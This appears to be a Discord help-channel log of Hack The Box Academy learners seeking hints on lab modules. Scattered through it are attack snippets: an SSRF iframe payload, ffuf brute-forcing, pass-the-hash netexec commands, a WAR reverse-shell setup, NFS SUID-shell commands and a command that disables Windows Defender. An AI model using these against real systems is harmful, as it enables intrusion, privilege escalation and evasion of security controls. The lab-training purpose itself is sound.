Can someone help with this one? pretty sure i'm following exactly as shown in the module but having issues connecting to my kali share

The pass was misspelled

Hello

im in the middle of https://academy.hackthebox.com/module/115/section/1139 and im wondering if someone knows of another vnc tool than xfreerdp that will work for a "dynamic-resolution" this one doesnt work for the foothold box (maybbe cuz its linux?) my screen is too small ijust minmimized the terminal and i cant "get" it.

nvm remmina got me sorted

Windows Privilege Escalation Citrix Breakout: Submit the Administrator's flag from C:\Users\Administrator\Desktop

How do I get out of the windows iso to do what I need to do in the ubuntu terminal?

You can DM if you are still having issues.

yo

may i ask for some help

regarding this module

So you are provided a foothold correct? So take a small bit of time to enumerate that foothold a little as some things are in plain sight. I am also going to delete these screenshots as that module is above Tier 0. Regardless that should hopefully help you get started. Sorry I forgot what channel I was in when I posted this response.

@gray yacht thank you will do when I have time to tackle this question again

i'm working this one too at the moment ^_^

let me know if you want to soundboard ill be on for another hour or so

fuckin thing is CREEPIN

ok i think its clear once its clear. keep your nmaps short and sweet. --top-ports 500

my nmaps were hanging

it was as simple as checking for creds stored in the foothold

but ty

not sure i follow you

thats not how i solved it but glad you got it

hey mind if we dm about a few things? i am solving it now and wondering how you came up with what you did

i mean only thing ive solved is q1 but sure

well

managed to infiltrate

Find the hidden admin directory first

Use wordlist-mode with rockyou.txt to crack the RIPEMD-128 password. can anyone help me as i am stuck over here how to do it where to find the hash password attack module

Dumb idea, but for Pentester Pathway, should I skip the AD module, finish the web modules and then go back to AD modules before I do AEN?

You can go in any order you want. Some modules build off previous knowledge from the path though.

hello everyone. im new here can someone help me a bit?

What do you need help with?
Please read #welcome #rules and #faq

just to start. assming im a full beginner and want to start. where should i start? which path or module you guys suggest?

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

so itmeans i should start with networking? and i wanted a tip... im kinda broke rn so shouldi really consider buying htb to access other things which i cant now

come in dm please

Why?

There are many Tier 0 modules in the Academy. They are free of charge.

Windows Privilege Escalation.

Other files - section

Using the techniques shown in this section, find the cleartext password for the bob_adm user on the target system.

I did search the entire packages folder, where in the module it's said to contain passwords ( uers likely store them there). Yet, I have found nothing. Any hints?

Has anyone done the "SSL/TLS Certificate Pinning Bypass" section of "Android Application Dynamic Analysis" module for help?

Is someone able to help me understand a question in Windows Event Logging Basics? the first question im getting confused on why we are looking at an event (8/3/2022 at 10:23:25) but the answer is in a different event (8/30/2022 10:23:49 AM:)?

Which module should be choosen after completing "introduction to active directory"?

New to HTB, looking for teammates to collaborate on labs via shared terminals. Anyone into web pentesting?

I miss the previous moderator ! he was active and really good with guiding students

yo guys im on AD enum, cross forest attacks from linux

im supposed to have credentials for the user wley, but theyre not mentioned in the section

Hi everyone, I’ve been stuck for 2 days on the Injection Attacks Skills Assessment (https://academy.hackthebox.com/module/204/section/2235) and I need some help.

I can’t find any internal port that works through the SSRF. <iframe src="http://127.0.0.1:PORT/" width="800" height="500"> I’m pointing the SSRF to 127.0.0.1, and the only port that responds is 80, but the server response gives errors with external resources (fonts, CSS, JS), so the PDF doesn’t even get generated.

I’ve tried all the common HTTP port wordlists from SecLists, and none of them worked. I’m completely stuck and would appreciate any guidance on how to proceed.

Thanks in advance.

have you tried modifying the error into 200 response via burpsuite?

Hello guys, I was studying bash scripting and I'm kind of stuck on this problem. Can I get your help https://academy.hackthebox.com/module/21/section/128 Thank for the help

@little belfry this is not the server and please , English only

Don’t spoil content please @leaden island

didnt mean it sry

No worries

Look at this section: https://academy.hackthebox.com/module/143/section/1269

You can use the other user as well

yeah found it thanks

Hi all, need help with the following module 'https://academy.hackthebox.com/module/80/section/780'. It states to right click the request then select 'Do Intercept - Response to this request', however as you can see in my screenshot, i don't have this option. Can someone assist please?

you are clicking in the wrong area it should be on the requested page try right clicking in the bottom left portion

Thank you but i get the same options.

go to the intercept

I'm there, now what do i do please?

you have to intercept a request first

once you intercept the request you will be able to see a request in the right side

Aha! my bad, thank you!

like this

you can dm me

@prisma wing theres an entire module that covers burp and zap have you looked into it?

Thanks for the suggestion! I actually already tried that, and in my case the response is already 200 OK. The issue isn’t the status code — it’s that wkhtmltopdf can’t load external resources (fonts, CSS, JS) from CDNs, so it ends with Exit with code 1 and the PDF doesn’t get generated.

I think the problem might be the port, and I’ve tested many ports using common HTTP port wordlists, but I haven’t found any that respond correctly. The only port that responds is 80, but it still gives the errors I mentioned above.

I believe it must be another port, but I need help figuring out which one works...

Got it thanks man!

No I haven't, I will deffo look into it though. Thanks man!

you should try a universal port scan as well , like literally all 65535 ports via nmap

I actually already tried scanning all 65535 ports, but it’s not really viable in this lab. Each request goes through wkhtmltopdf to generate a PDF, and every PDF takes several seconds to process. Sending 65k requests would take days, and if done in parallel, the PDF generator would likely break.

This isn’t about Nmap... I’m trying to connect to an internal service using SSRF with a payload like: <iframe src="http://127.0.0.1:PORT/" width="800" height="500">
There must be another way to solve this, since scanning all ports like that isn’t practical. I’m completely stuck, I’ve tried everything, and I just can’t figure it out.

That isn't an intercepted request; in your screenshot you are trying to perform the same action demonstrated in the section on intercepted request that already has a response. I gather this because you are in HTTP history and not using Intercept. Does this make sense? So intercept a request and hold it, then right-click and select the Do Intercept - Response to this request option.

In the skill assessment of File Upload Attacks, I uploaded a file name HTB.jpg, I should be able to access it through ||http://94.237.60.55:42617/contact/user_feedback_submissions/250822_HTB.jpg|| but the sever just throw not found at me, can some one help?

UPDATE, I FOUND A WAY TO FIX IT BELOW.

Yes makes perfect sense thank you!

All of it didn't work man

Alright, thank you

I've just DM you

Can you check my DM, please 🙁 I encountered the same thing?

No

Any can help me?

I found ways to fix it

turns out you have to press this little button first before uploading

Then the file will appeared after you press SUBMIT, anyone having the same problem in the Skill Assessment in File Upload Attacks - this is the way. Bye everybody

Hey y'all, my target doesn't want to connect via ssh and whenever I do try and connect to it via ssh I get "ssh: connect to host 10.129.219.235 port 22: No route to host"

when I try and ping it I get "From 10.10.14.1 icmp_seq=1 Destination Host Unreachable"

I am in the Find Files and Directories section of the Linux Fundamentals course, could someone please help me out? VPN is up and I launched the corresponding .ovpn file as well.

you can DM me

Try another VPN server

I have tried like 6 this morning. Issue has been ongoing since last night. ChatGPT says it's an issue on HTB side and / or it could be that the machine is retired which wouldn't make sense if the course is still available (to me anyways) and so I decided it would be best to come ask in here to confirm or deny that being the case.

I am willing to use PWNBOX but since I am a free account catching up on HTB to where I was on LetsDefend I need confirm it so I can dial in the next 2 hours and try and finish the course entirely.

I am using EU Academy 2 server currently, and I was able to connect without any problems.

I will try that rn

Ayyyy that worked!!!!

@brave field you da best

Thank you so much

I'm also facing the same issue. Have you resolved it?

Not in the intended way I guess 😀 I found an article and then an exploit in Metasploit, exploiting exactly the same problem, but with model endpoint. Funny part that exploit was broken, so I fixed it and created a pull request. https://github.com/rapid7/metasploit-framework/pull/20489

I'm not totally sure where is the problem with given solution in article on the academy, but I tried with different YAML files, handlers, etc.

you can DM me

For module 'https://academy.hackthebox.com/module/80/section/781', i need to enumerate the admin id and it says to go abck to the brute force attacks section but it does not explain how to enumerate the id of a user, only the usernames or passwords. How would i enumerate the id please?

I haven't taken the module but I'd wager a guess it teaches how to brute-force a parameter using a wordlist?~ so look at your own user id and generate a wordlist based on that

you can use burpsuite intruder

Thank you, i have tried already. This is what i've tried 'ffuf -w <(seq 1 1000) -u http://94.237.57.211:44565/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "user_id=FUZZ&password=invalid" -fr "Unknown user"' something is obviously wrong but i do not know what

Thank you, i'm not experienced with this but i'll give it a go

probably that: <(seq 1 1000)
1: this is not how io directors work (the file dies before ffuf can read it)
2: It's probably easier to just do: seq 1 1000 > ids.txt

Thanks again but it's giving me the same output, not sure on this one

I'm just going to brute force the username and password, it;d be easier lol

Or <<< seq 1 1000

But to inject code it'd be $() not <()

Or `code here`

(The backtick method is more archaic)

Advanced XSS and CSRF Exploitation - any nudge on the back half of this skill assesment?

you can dm me

cool ty

hello, i am in Skills Assessment - Password Attacks and need some help/hint. i have initial foothold at DMZ01 i do not know after that and stuck.

You'll need to pivot

thank you i will try to do it.

I suggest ligolo-ng

okay, Thank you

What have you tried so far and where did you get stuck at the moment?

Hello i m trying to complete the "Attacking Thick Client Applications" module searching for the credentials, but when i m about to launch the "monta.ps1" script with powershell, i got this error in CLI "System.Management.Automation.Runspaces.InitialSessionState' threw an exception." . Seems i can not launch powershell at all. NO CLI.
Can someone help me?
Thank you in advice.

I'm trying to do the Vulnerability Assessment with Nessus, but can't get Nessus to run on the HTB Workstation. I don't have permissions to install, so I can't figure out what I'm doing wrong...

I am trying to use VirtualBox to get it to work now.

Oh I've solved this, Thanks!

Thank you so much for your help. I have also tried different YAML and handlers, but I am still getting the same error.

You shouldn't have to install anything just navigate to https://10.129.xxx.xxx:8834 with a browser.

Don't I have to start the nessus service first? It won't let me do that. When I try to navigate to the ip:port, it says "Connection has timed out".

You can DM what you are seeing on your end, but no, from what I recall it should already be running.

Try :8834

I would reset your target and try it again.

Ok. I'll try that. Even on my VirtualBox, it scans for a few seconds and gives blank reports.

You shouldn't have to scan anything either.

Ok. So, it's a saved scan when I login with the provided creds?

It mentions if you don't want to wait for scan data it is available.

Right. I just wasn't sure cause I haven't gotten that far. lol

I tried to install it and it said that I didn't have permission?

I'll try again.

I just spun it up and went straight to the UI

Just had to accept the cert. Using off the shelf kali with VMware. I'm on us-academy-3

That's odd.

Ok. It let me install it that time. idk what I did different. lol

Used curl instead of just downloading from the browser...

Did you ssh into the target?

I assumed this was the nessus SA.

Which section are you working on? Can you drop a link?

Vulnerability Assessment

https://academy.hackthebox.com/module/108/section/1231

https://academy.hackthebox.com/module/108/section/1233

The second one is the actual skills assessment part.

Ok and you are using your VM right?

I'm trying both ways. The pwnbox wasn't letting me install before, so I went to VirtualBox, but that wasn't doing the scanning, so I went back to pwnbox.

Ok, so make sure you only have one up at any given time as they use the same IP.

Ok. I am.

I did.

You do not need to install nessus, as the target is the nessus instance.

This is a Tier 0 you guys can keep going here unless you want to take it to DMs.

The more the merrier. lol

I've tried using "localhost" too.

I got it!

Well, YOU got it. lol

Thank you! 🙂

This has been driving me crazy for the last week! lol

I appreciate you both! 🙂

Hello ? The command netexec smb <ip/24> -u Administrator -d . -H <hash_value> is the same with the command netexec smb <ip/24> -u Administrator -H <hash_value> —local-auth?

Hi, is there anyone who solved Applications of AI in InfoSec skill assessment. Long time here many tries but no result. Any working hint?

I tried many variations of the code, but the answer is still the same: "Your model accuracy is 0.0. Please improve it to at least 90% to receive the flag."

Yes, both commands are functionally the same — they both attempt local auth with the given hash.

Some people prefer -d . because it’s shorthand and works in CME (legacy habit).

Others prefer --local-auth because it’s explicit and avoids confusion when you’re mixing domain + local checks in the same engagement.

@cunning canopy @gray yacht I got done with the Nessus Assessment! It was fairly simple after I got into Nessus. The only problem I had after connection is that it kept timing out and I had to refresh it after a few minutes. It probably happened 3-4 times, but that's all that slowed me down. Thank you both, again!

@gray yacht can you check DM

Hey guys please I need help from anyone who finished the Introduction to bash scripting module

Windows Privilege Escalation Pillaging
Log in as Grace and find the cookies for the slacktestapp.com website. Use the cookie to log in into slacktestapp.com from a browser within the RDP session and submit the flag.

I press the save button in Firefox cookie menu after pasting content before refreshing but I'm not getting a change in the page itself.

Hello there, anyone out there has done the Introduction to Deserialization Attacks assessment 2?

I have the ping working, but I don't get the callback, I already tried a lot of bypass for the blacklist

I maybe able to help you

You can DM me for help. I only have a few mins before i log off though

guys i started the Linux Privilege Escalation module and on the very first question where i have to connect via ssh the whole thing lags and im not able to perform any commands the whole thing just frozzes any idea how to fix it ?

Try resetting the machine?

Ty

i did many times also changed the vpn file a couple of times

Anyone have any success with DACL II Skills assessment?

if anybody could help em out and take a look at my community help zone question it would be greatly appreciated

https://discord.com/channels/473760315293696010/1408620732396863499

Is this related to a module?

you didn't input a host/ip to connect to

If your question is related to a module you should just ask it here.

i cant share screenshots here

yeah its related

i did

no you didn't

howdo i start hacking?

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

hi

Module: Windows Privilege Escalation
Section: Citrix Break Out
Section Link: https://academy.hackthebox.com/module/67/section/2502

its windows machine , but when i connect to RDP it give linux machine , what's now ?

Did you follow the instructions?

no , which instruction u mean ?

read the section again

Hello friendly hackers, I am having trouble with the Skills Assessment for CrackMapExec Module
Section link: https://academy.hackthebox.com/module/84/section/1747
Qn 4: Read the flag from the shared folder Ccache.
May I know if anyone can point me in the correct direction?

you can DM me

Hello guys, I am doing this Linux Enum module for CPTS. today when i tried to ssh to the target it is denying to connect. It will be helpful if someone could help me out.

Im connected to the vpn, the target machine is also pingable. But when i try to ssh, it says Connection refused by target.

Module Name: Linux Privilege Escalation

sorry, which module and section?

Module Name: Linux Privilege Escalation
Section: Environment Enumeration

hello guys i'm doing windows fundamental module i'm at the last exercise when i get the SID of the users and the group I created the answer is refused

You should be able to ssh in. What was your ssh command?

ssh htb-student@<ip>

what's the ip

i check the target in nmap, it shows ssh as open port.

ssh htb-student@10.129.205.110

probably try restarting the target

It's the wrong answer if it doesn't accept it

I have done it several times.

try changing vpn regions

Okayy!! let me check

Yeah I sorted it out

Currently having some issues/confusion in the Windows Lateral Movement > Windows Server Update Services (WSUS) module. Anyone know if RDP to DC01 should work from start? It worked once for me then I reset the lab to do second question and now its not. And I seem to need it to install updates...

You can dm me if you still need help

hi

i am new in server

i can't send a message in géneral chat

@river grove

Hi and welcome
To access the general chat, read and follow #welcome
Please also read the #rules and #faq and don't just ping random people.

This is not the server for such things.
Please read #rules and #faq.

sorry bro

OK

sorry

@trail ingot generally speaking; sharing details of a company you're doing a pentest of is highly unethical at best. also: this isn't an lfg server

are you sure you set the LHOST properly? (make sure you check the interfaces line up)

yes i am sure i rechecked again twice and also checked that the file is .war only

so you're using the 172 ip?

should i skip host-1 for now and go for host-2 first ? @fathom pendant

yes || 172.16.1.5 for lhost ||

you shouldn't have to skip it, but i'd use a higher port number to be sure, maybe it's not able to open/bind that port

i have also tried 4444 default

i also assume you launched the war file after uploading it

(navigate to the launched page)

it deployed on its on

it's not gonna automagically run until you call the webpage

i relaunched it tho because it was taking so long

i'm also assuming you have a listener waiting for the call

did you navigate to (click on) the directory /hell?

i have it on msfconsole only , exploit/multi/handler and i made sure to set the correct payload too

OH NO I DIDNT MY BAD

so sorry i took so much of your time i didn't know i had to do that

3...2...1...

i thought it was running because it was deployed

deleting the og message because it's spoiling content (even though you used spoiler text, spoiler text really doesn't do anything)

thankyou very much @fathom pendant , also can you nudge me how could we find the creds given in hint on our own ? like i had to look up the hint for the creds

did you take a look at the desktop of the jump host you're given?

guys i started the Linux Privilege Escalation module and on the very first question where i have to connect via ssh the whole thing lags and im not able to perform any commands the whole thing just freeze any idea how to fix it ?
i restarted the machine several times and changes the vpn file a couple of times but still its freezing on commands and on login aswell

user@debian:~$ sudo ssh htb-student@10.129.205.110
[sudo] password for user: 
htb-student@10.129.205.110's password: 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-148-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

reach out to support, also don't know why you're doing sudo ssh

i did i didnt see the specific creds given in the hint, i saw many documentations tho, i didnt read all of them but glided through a few

where can i contact support ?

the jump host is the initial host you rdp into (or ssh, i forget if you can do that for this one)

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

thanks

are you sure the username wordlist is correct which you're supposed to use ?

https://academy.hackthebox.com/module/296/section/3404
What type of attack was being used to escalate the privileges in the above example? (Format: two words)

module locked :cannot see

Have this exact issue. Found it?

I need a small help with an additional/optional exercise in Cracking Passwords with Hashcat,

You are conducting a penetration test for your client Inlanefreight and have Responder log data from the tool running overnight. You obtained the NTLMv2 password hash for the adconnectsvc user but all attempts to crack it have been unsuccessful. Recently, however, you read about another method to obtain something usable when you have an NTLMv2 password hash. Checking the project files from the previous year you also have the last NTDS dump to work with. Using Hashcat, find a way that you can leverage the NTLMv2 hash to authenticate as this user within the domain. Submit this string as your answer. Download the file "hashcat_addtnl_exercise.zip" from optional resources to get started.

Can i attach the .log and NTDS file?

Just need a small hint

you cannot, since the module is above tier0

Anyone? If someone’s done it, just need a small hint :’(

When the password attacks module talks about this section:

A salt is not a secret value — when a system goes to check an authentication request, it needs to know what salt was used so that it can check if the password hash matches. For this reason, salts are typically prepended to corresponding hashes. The reason this technique works against rainbow tables is that even if the correct password has been mapped, the combination of salt and password has likely not (especially if the salt contains non-printable characters). To make rainbow tables effective again, an attacker would need to update their mapping to account for every possible salt. A salt consisting of just one single byte would mean the 15 billion entries from before would have to be 3.84 trillion (factor of 256).

Are they saying salts are used to prevent previously known/leaked/crack(unsalted, reused) passwords from being usable on the service?

If not, then im failing to understand how salting passwords doesnt require a table of salts to be needed to verify the password? application still has to keep up with a unique salt for each password... which seems adding little extra securirty for a lot of extra overhead?

you don't necessarily need a unique salt for each password, or the generated salt isn't a secret method

oh wait i think it clicked... the application doesnt store the password? it stores the salt and a hash of the salt + password then checks that?

ok i think i get it now. if your database of creds is leaked its only SLIGHTLY better than storing the password hash because you still have to store the salt alongside the password hash. but i guess its better than nothing?

Hello, could anyone please help me to deal with my ctf challenge (pwn). I'm a newbie and honestly i hav tried to solve it for 6h long 🙁

it's a program. it works like u insert your name and your birthday. it will told you the flag if you insert the same as they want or they wont give u
it's told that we must know/use shellcode
but idk how to

Not sure man, we solve htb boxes which are kinda like ctfs, and other challenges here. Consider switching gears and doing a box

this channel/server isn't for random challenges/ctfs

Hi

sorry, can u tell me which channel is pls

if it's a challenge on the htb platform; read and follow the instructions in #welcome to access #challenges

do i need to echo -n or something? i know theres a trick sometimes where you have to do somethign to get rid of extra lines or spaces?

Hi folks
Is there any guide about how to create machines? (I mean, not the guide about how to submit machines, but how to actually create one)

echo adds a newline at the end of the line by default, with echo -n you can disable this trailing newline. If you want to compute a hash of a string you need to add the -n otherwise you will compute the hash of <your_string>\n.

thanks. im still having problems, i dont understand what im doing wrong, chatgpt told me that echo '...' is not the same as echo "..." | .. so i'd need to use single quotes for the backticks im not sure if they're even required this is silly

i still dont know if the ? is necessary or not

Hi guys I just purchased silver annaul

Today and my goal is cpts

From 0 to hero and what path before pentesting path is suggested to take ?

Are you totally new? take the zero to hero stuff then take the intro to cybersecurity or whatever thats called then take the cpts

I mean I have net+,sec+,pen+ then I'm already halfway through ejpt and I know basic linux privesc and pentesting stuff

Do you know how to use burp, how to curl, how to fuzz etc?

sounds like you do

Yeah I know basic stuff with burp like turbo repeater for rc, repeater for uk multiple times response analysis then one more function which is used to fuzzing and idk how to use curl to the fullest tho

I did some labs on port swig academy but not good coder or web sec expert tho

sounds like you've got a handle on things. I feel like you'd be ok starting CPTS since thats what you came here to do

You can consider I have 0 coding

it wouldnt hurt to browse thru the intro to cyber sections or whatever its called

That's the main problem

i actually picked up some good info from that module too just because it was available

i think it was free when i did it

there's always little nuggets of golden info to gather all over these paths or modules or whatever but you prob be alright just starting the cpts.

I think I can access everything till tier two which covers what you said doesn't it?

i believe so

Then I'll do the junior cyber analyst path first which is their newest cert

That is the basic one which I could find on website please do share the fundamentals path link that you used

i think its called information security foundations in the paths sections

Gonna have to move laterally.

oh ok! So its not on the initial host?

hy

If you don't see it there, then I would see if that user can move laterally, as it may be in their home directory on a different host.

aaah, makes sense. Need to fire that lab up again and try 🙂 Thanks a lot!

Hi! Someone in Attacking AI - Application and System?

Is anyone facing a problem using droopescan?

Hello may i dm you i want to talk about silver annually

Hi Im stuck on the NTLM Relay Attacks Assessment QN4 after getting QN3 so is there anyone that can DM me about hints to get through this qn?

Offcourse man always brother

i have send the message thank you!

Not sure if this is the best place to ask (and I probably just missed something obvious). But how do I copy to/from the in browser attack box?

Evening gents

can you explain a littlbe bit more

Hello, I am stuck on Active Directory Enumeration & Attacks module - Credentialed Enumeration from Windows. I am trying to answer the first question, I feed it the amount of kerberoastable users I could query from bloodhound, but no numbers are correct (I get only one user). And for some reason results are different with SharpHound.exe 2.7.1 (it shows less users than with Sharphound 1.0.3), why?

How about this: what are the steps you take to copy a flag from the attack vm into the answer box? (Copying IPs in would be nice, but they seem to be 10.128.8x.c, so whatever)

select that text ...press ctrl+shift+c

then go to browser paste simple with ctrl+v

Uh if that’s it, I do feel dumb - thanks (hope that is it too)

np

everyone learns from somewhere

is there an Sysreptor module ?

not sure if you figured it out or if anyone else has issues this worked for me
sudo timedatectl set-ntp off
sudo rdate -n ip address

https://academy.hackthebox.com/module/67/section/630
task : Using the techniques in this section obtain the cleartext credentials for the SCCM_SVC user.

we don't have write permission in share , what to do ? or i doing something wrong ?

not on HTB Academy

you dont need write permission to read something...for that only read perms will be enough

if you want to upload something to that share then you need write permissions

Hello, I am stuck at Blacklist filters section of File Uploads Attack module. i fuzzed extensions and found few extensions like .php3, .php4 but .phtml wasn't allowed like they showed in HTB reading but anyways i uploaded shell.php4 but when i visit the url to cat the flag. webshell is not working page is completely blank i viewed page source and getting my whole php code back. i have created a detailed note of what i have done till now but since i think i am 90% there this detailed steps might be looked like walkthrough so if someone have already done this module or guiding me right now. i might paste here and once you read it i'll delete it afterwards soit did not provide any spoilers/walkthrough for upcoming users

you doing all good...the file you are uploading to get webshell...change it code to directly get reverse shell on you listener...inthis way you will get rev shell on the listerner on your kali ...easily cat

try this

ok let me try this and can you quick what i have done till now , or should use this phpbash and listner method first then talk. i mean htb didn't showed this method. ik this is also one of ways to get a reverse shell but i want to know what i am doing wrong this whole time.

@opal shuttle i think i should try the above method first

you can dm me

if you wanna talk in detail regarding this

you are not doing wrong...just multiple ways

and each has their own pros and cons

in rev shell module they teach this i guess

not sure

yeah you are right. but why this method isn't working(there could be a important lesson or mistake that i can learn)

they do

dont know

but webshell has some limitations

so its better to get a rev shell and try there

if its not working

@woven storm lets move to dm

Module Name
Linux Privilege Escalation
Section Name
Miscellaneous Techniques
Question you're struggling with
Review the NFS server's export list and find a directory holding a flag.
Generally what you've tried (while avoiding spoilers, i.e. logged in as j and couldn't find anything)*
I ssh'd into the target server, then immediately ran the following commands with the following output:

htb-student@NIX02:~$ cat /etc/exports
..SNIP..
/var/nfs/general *(rw,no_root_squash)
/tmp *(rw,no_root_squash)
htb-student@NIX02:~$ ls /var/nfs/general
exports_flag.txt
htb-student@NIX02:~$ cat /var/nfs/general/exports_flag.txt
<flag>

My problem
I don't know how I'm actually supposed to mount the filesystem and solve the challenge.

yeah thank you

ummm...i havent done that yet

but i guess chatgpt will help you out with that

for quick help ..if you want immediate help

I don't want immediate help, I just want to understand how to exploit this particular misconfiguration. Specifically, there are some commands in the section I don't understand:

root@Pwnbox:~$ sudo mount -t nfs 10.129.2.12:/tmp /mnt
root@Pwnbox:~$ cp shell /mnt
root@Pwnbox:~$ chmod u+s /mnt/shell

I don't understand where I am supposed to run these commands.

On your own machine it will mount it as root you place the file als root with suid and execute it on the target.
Because it is root and suid 🤗🤗

So the NFS is mounted to my local virtual machine or htb's box?

hey guys, is nibbler broken? NOTHING works for me, i tried following the module but i cannot ecalate the privilages whatever I do

That's pretty clever.

its getting a bit frustrating cuz its like the 3rd time im trying to do it and Im not sure if I am doing something wrong? executing the ||monitor.sh|| throws errors and it doesnt do a thing

jfc now even the port listening doesnt work

The attacker box.

Hi, I made a little python script to correctly encode gopher request for SSRF section in module - Server-side Attacks, can I share it on github?

Yeah that's fine

cool, thank you

no, but write HTB to throw it in as an idea.

What would you expect from such a module?

Can you check DM?

Currently doing DACL Attacks II skills assessment and this is the hint for the last question || Search for rights in non-common locations where you can control everything. || Tried looking at ldap attributes - curious if anyone might have any input

same path, are you working on the Skills Assessment?

Everyone. I needed a little help. I want to create a payload for my android 8 to test it. Can you guys please help. I'm not a full beginner but a small help is appreciated.

This has nothing to do with modules please read the rules and follow the instructions in #welcome to gain access to a more appropriate channel

I need some help with windows lateral movement- skills assessment Q5, finding the password for VNC.

Hello everyone, I know I'm not in the right place. There's something I don't quite understand. I validated my Discord account for HTB, but the bot command returns an error. Why?

DM me

You can DM what you know.

I'd focus on trying to leverage WSUS.

No. Im stuck in Rouge Actions. Can DM to you?

Ah, thx! Got it 😁

i found the ftp transfered file called flag but thats not the flag, or else we didnt watch the same transformer movies

found it, this question was using the attached file whereas the tutorial was on the live data

By tutorial, are you referring to the guide provided with annual? If so, sharing information from that is generally against ToS

I have the same error, I change the yaml a couple of times and still get error. you solve it?

by tutorial i'm referring to the text that you have to read to learn stuff, like here: https://academy.hackthebox.com/module/229/section/2445 (an example) In my case, i thought that both challenges were based on the live data that we capture in the tutorial from our pwnbox. But it turns out only the second question was that way...

Its still a tier 2 module so sharing info from the modules is still spoilers

which info

But yeah, sometimes it can be captured, and sometimes its in the given data

If the info is directly from the reading, its a spoiler still

Module: Pivoting, Tunneling, And Port Forwarding
Section: RDP and SOCKS Tunneling with SocksOverRDP
Question:
This section talks about loading a plugin named SocksOverRDP-x64.dll using regsvr32.exe
But, the file SocksOverRDP-x64.dll is being deleted by Windows Defender.

How am I supposed to finish this?

Edit: solved, I had to run
Set-MpPreference -DisableRealtimeMonitoring $true
before doing it

Disable real-time protection

oh you solved it you said. nm.

Module: Pivoting, Tunneling, And Port Forwarding
Section: Skill Assessment
Question: Submit the contents of C:\Flag.txt located on the Domain Controller.

I do see the IP of the DC, but non of the credentials I found is working, also RDP with mstsc.exe doesn't work.
I tried winrm since port 5985 is open but that also didn't work.
Any nudges?

perhaps you're already at the last stop; look around with the access you have

I am at the last stop, but couldn't find the way to DC

perhaps you already have some access to the DC

Module: MSSQL, Exchange, and SCCM Attacks
Section: Skills Assessment
Can someone confirm that we can authenticate on any of the MSSQL database (DB01 or DB02)? I tried a lot of differents credentials and I can't connect to to either of them

Can someone give me a nudge on Module "Windows Lateral Movement" Skills Assessment #2 question? I've been stuck for 2 days straight and I highly appreciate if someone can help! Thank you in advance 🙂

Sir I have a question regarding wordpress based attack can I put my query here?

Which module are you working in?

is there someone can helpmewith wifi pentestinganddecode cap,hash

give me amodule is there someone can helpmewith wifi pentestinganddecode cap,hash

Not hack the box platform , from vulnhub

Then best to ask in #vulnlab

If you have no access, read and follow #welcome

ok

There are multiple wifi modules. Soon there will be a wireless red teamer job role path. Give it a few more months.

i wouldlike comeupon it

Perhaps also a mobile pentester path, together with the Android modules.

That may be a thing too. Hopefully they’ll be iphone hacking modules tho it’s likely that part won’t happen. I say it might because mobile hacking lab has material on hacking iphones.

So it’s not totally out of the question for htb to have it

And offsec has macos malware certification so macos hacking pathways are not out of the question either.

I think altho its not the most likely thing

But imo an iphone and android mobile pentesting path would he perfect

Or even ipad

Windows Privilege Escalation -> Print Operators

how i'm supposed to use UACme to see the full list of privileges ?

I'm currently reviewing the Active Directory Enumeration & Attacks.
At Credentialed Enumeration - from Windows, the first question says Using Bloodhound, determine how many Kerberoastable accounts exist within the INLANEFREIGHT domain. (Submit the number as the answer).
Using the latest BloodHound CE, it gives me 12 Kerberoastable accounts, but the answer I have used in the past when doing this module is || 13 || and it appears to be the correct answer somehow
Is that a mistake in the module or what?

Hi guys, I am currently doing Password Attacks - Pass the Hash (PtH). I am stuck at getting David's NTLM/RC4. I have RDP into the machine and use mimikatz with sekurlsa::logonpasswords but it doesnt show David's hash or user with david. Is there something I have missed out?

Maybe has to do something with the krbtgt account

Can anyone nudge me on the ||xpath injection ||part in the final skills assessment of Injection Attacks module from CWEE path ?

you can DM me

Hi. I'm trying to finish the file upload: blacklist filters module on HTB Academy CWEE, and I would like to ask a general burpsuite question.

I know for a fact that the .phps , .php, and .php5 extension are blacklisted (see fig 1), but why does intruder show the response as successful (a 201 success response) ? (see fig_2.1 and 2.2).

Should I assume that the application is using non standard HTTP responses?

Both, the repeater and the intruder show a 200 status code. Just the response body is different, most likely due to the encoding in the filename.
The 201 is the time it took the application to respond in ms.

Which version of SharpHound.exe did you use?

after some searching i was able to download and compile it and i moved it to the windows host but didn't seems to work i tried different keys or options with akagi64.exe but nothing worked

In DACL Attacks II "Shadow Credentials section is this a typo? Shouldn't it be Jeffry's? Couldn't find any path forward with Gabriel's credentials.
Authenticate to (ACADEMY-DACL02-DC01) with user "gabriel" and password "Godisgood001"

• 2 Compromise the account PCTEST001 and read the flag located at \LAB-DC\PCSHARES\pcflag.txt

Yes, that is correct.

The one that was in the \Tools in the windows machine itself.

Idk which version it was exactly tbh

I have a question about purchasing a tier 4 module. If this module is later transferred to tier 3, will I get 500 cubes back?

Yes, at least that's how it has been handled so far.

thx 🙂

hey guys, im using parrot vm and i cant seem to install smbclient, what do I have to do to install it?

I need it for dancing:/

In module https://academy.hackthebox.com/module/144/section/1255
How do I know what the dns server is to do the zone transfer against.
Or which dns server to use ?

It is the target ip 🙁 feeling 😵‍💫

Is anyone working through the latest AI Red Teamer module? Attacking application and system components?
I think the Rogue Actions lab is bugged, I can't get it to work for the life of me. Maybe it's a skill isue 🙂 Anyone in the same boat?

Getting started - service scanning module

Anyone know why when i try run an smbclient scan i recieve this error

    Sharename       Type      Comment
    ---------       ----      -------
    print$          Disk      Printer Drivers
    users           Disk      
    IPC$            IPC       IPC Service (gs-svcscan server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
protocol negotiation failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

it lists the shares however seems to crash after

It’s probably server side but as long as it’s listing all shares before the error then it should be fine.
Try another smb enumeration tool if the problem persists and it’s annoying.

ah ok ty well the thing is

do_connect: Connection to  failed (Error NT_STATUS_NOT_FOUND)

I also recieve this when trying to log in to the share with the specified username and password 😭 do you think that could be server issue aswell or i just need to try harder haha

Remove the extra backslashes that’s probably the problem now: \\ip\share